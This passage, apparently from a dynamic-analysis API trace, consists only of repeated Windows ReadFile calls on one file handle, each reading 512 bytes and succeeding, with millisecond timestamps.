(in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 
[0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, 
lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, 
lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: 
lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, 
lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.943] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 
[0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, 
lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, 